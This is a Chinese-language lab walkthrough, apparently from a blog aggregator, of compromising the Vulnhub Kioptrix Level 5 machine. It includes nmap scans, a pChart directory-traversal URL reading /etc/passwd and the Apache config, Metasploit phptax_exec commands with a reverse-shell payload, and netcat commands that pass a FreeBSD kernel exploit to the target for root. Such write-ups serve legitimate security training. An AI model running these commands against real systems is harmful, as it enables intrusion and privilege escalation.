【Vulnhub靶场】Kioptrix Level 5

server/2024/10/23 5:52:50/

目标

本地IP:192.168.118.128

目标IP:192.168.118.0/24

信息收集

nmap探测存活主机,扫全端口,扫服务

首先探测到目标ip为:192.168.118.136

nmap -sP 192.168.118.0/24nmap -p- 192.168.118.136nmap -sV -A 192.168.118.136

web渗透

访问web服务192.168.118.136 和192.168.118.136:8080 ,发现web页面都无用

打开源代码查看,发现有一个可拼接的url

拼接url,访问 192.168.118.136/pChart2.1.3/index.php,发现页面也没有可利用的东西

查询pChart漏洞

将此文件拷贝到桌面打开查看

locate php/webapps/31173.txt/usr/share/exploitdb/exploits/php/webapps/31173.txtcp /usr/share/exploitdb/exploits/php/webapps/31173.txt /root/Desktopvim 31173.txt

 里面说明了里面有目录遍历漏洞,并给出了漏洞利用方式

构造下面的路径访问

http://192.168.118.136/pChart2.1.3/examples/index.phpAction=View&Script=%2f..%2f..%2fetc/passwd

发现没有什么用处

访问此路径查询apache配置文件

http://192.168.118.136/pChart2.1.3/examples/index.phpAction=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

 里面这个内容显示出 User-Agent

我们使用BurpSuite,修改浏览器的 User-Agent信息,再次去访问web服务:192.168.118.136:8080,看看会不会有和刚才不一样的结果

将所有的数据包全部如下修改

点击里面唯一的连接,最终得到如下页面

尝试查询 phptax 漏洞

searchsploit phptax

MSF利用漏洞

启动msf,查询漏洞,使用漏洞,设置参数,设置payload ,设置payload参数,运行

msfconsole
use exploit/multi/http/phptax_exec
show options
set rhosts 192.168.118.136
set rport 8080
show payloads
set payload cmd/unix/reverse
set lhost 192.168.118.128
set useragent Mozilla/4.0 Mozilla4_browser
run

最后利用成功,得到shell,输入whoami,为用户www 

提权

查询系统内核版本等信息

uname -a

 查询 FreeBSD 漏洞

searchsploit FreeBSD 9.0

将此漏洞利用脚本拷贝到桌面

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c /root/Desktop

使用NC将此漏洞利用脚本上传到目标服务器,然后退出连接,重新run到shell上

nc -lvnp 8888 < 28718.cnc -nv 192.168.118.128 8888 > exp.c

 编译运行,提权成功


http://www.ppmy.cn/server/134090.html

相关文章

达梦数据库使用 Flyway

参考&#xff1a;db-migration: Flyway、Liquibase 扩展支持达梦&#xff08;DM&#xff09;数据库、南大通用&#xff08;GBase 8s&#xff09;数据库&#xff0c;并支持 Flowable 工作流。 需要注意的是&#xff0c;下面两个依赖的顺序不能颠倒&#xff0c;因为有冲突的类 …

计算机毕业设计Python+Spark知识图谱课程推荐系统 课程用户画像系统 课程大数据 课程爬虫 课程大屏 mooc慕课推荐系统 大数据毕业设计

《PythonSpark知识图谱课程推荐系统》开题报告 一、研究背景与意义 随着互联网技术的快速发展&#xff0c;在线教育平台已成为人们获取知识、提升技能的重要途径。然而&#xff0c;面对海量的课程资源&#xff0c;用户往往难以快速找到符合自己兴趣和需求的课程。传统的课程推…

代码随想录算法训练营第二十二天 | 回溯理论基础 77.组合 216.组合总和Ⅲ 17.电话号码的字母组合

回溯理论基础&#xff1a; 回溯效率: 回溯本质上是穷举&#xff0c;从所有答案中选出想要的。会增加一些剪枝的操作 回溯法解决的问题&#xff1a; 组合&#xff1a;N个数中找k个数的集合切割&#xff1a;一个字符串按一定规则有几种切割方式子集&#xff1a;一个N个数的集…

nginx的负载均衡配置和重定向

upstream_check模块 配置文件详情 upstream cluster1{server 10.0.0.4:80 weight1 max_fails3 fail_timeout30s;server 10.0.0.5:80 weight1 max_fsils3 fsil_tomeout;check interval3000 rise2 fall5 timeout1000 typehttp;check interval3000 rise2 fall5 timeout1000…

Java方法重载

Java方法重载是指在一个类中&#xff0c;可以声明多个方法具有相同的名称&#xff0c;但是参数列表不同&#xff08;参数类型、参数个数或者参数顺序不同&#xff09;的情况。在调用方法时&#xff0c;编译器根据参数的类型、顺序和个数来确定调用的是哪个方法。 方法重载的目…

vue3-高德地图天气小组件

效果图 使用方法 <weather-view type"rect-solid" :borderColor"[#7ACAEC, #068BBD]"></weather-view>天气图标文件夹 本来想全弄成svg动态图片的,但找了很久都没找到对应的图(只找到了几个),于是就暂时搁置了 组件全代码如下 注意getWeat…

nnUnet 大模型学习笔记(续):训练网络(3d_fullres)以及数据集标签的处理

目录 1. 数据集处理 1.1 实现脚本 1.2 json文件 2. 设置读取路径 2.1 设置路径 2.2 数据集转换 2.3 数据集预处理 2.4 训练&#xff08;3d_fullres) 3. 训练结果展示 关于nnUnet 数据集的处理和环境搭建&#xff0c;参考上文&#xff1a;第四章&#xff1a;nnUnet大模…

鸿蒙--页面跳转

效果 前言 基于Stage模型下的UIAbility开发,实现UIAbility内页面间的跳转和数据传递。 页面路由:提供通过不同的url访问不同的页面,包括跳转到应用内的指定页面、用应用内的某个页面替换当前页面、返回上一页面或指定的页面等 结构 ├──entry/src/main/ets // ArkTS代码…